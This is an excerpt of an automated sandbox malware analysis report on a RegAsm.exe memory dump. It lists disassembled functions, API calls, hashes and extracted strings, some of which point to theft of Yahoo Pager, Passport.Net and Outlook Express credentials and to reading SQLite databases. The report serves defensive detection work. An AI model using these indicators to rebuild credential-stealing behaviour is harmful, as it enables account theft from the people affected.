                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                      Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                      • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                      Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                                                      • String ID: Passport.Net\*
                                                                                                                                                                                                                      • API String ID: 2053021465-3671122194
                                                                                                                                                                                                                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                                                                                      Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                                                      • String ID: Personalities
                                                                                                                                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                                                                                                                                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                                                                                      Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                      • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                      Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 1670431679-1552265934
                                                                                                                                                                                                                      • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                      • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                                                                                                                                                      Function 0043DF30 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID: $no query solution
                                                                                                                                                                                                                      • API String ID: 368790112-326442043
                                                                                                                                                                                                                      • Opcode ID: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                      • Instruction ID: 13ed0bad29dc8f20330308844ce1f2220340576076c9bd20db88b336710dfa55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f59ee7c535991b4e4c1e2cd699b4550ba87100c19ab38750288448e459f31128
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46128A75D01619DFCB24CF9AC481AAEB7F1FF08314F14916EE895AB391D338A981CB58
                                                                                                                                                                                                                      Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                      • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                                                      Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                      Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                      Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                      • API String ID: 231171946-3708268960
                                                                                                                                                                                                                      • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                      • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                                                      Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                      Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                      Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                      Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                                                                                                                                      • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                                                      Function 0040C143 Relevance: 7.6, APIs: 5, Instructions: 54clipboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1189762176-0
                                                                                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                      Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                      Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
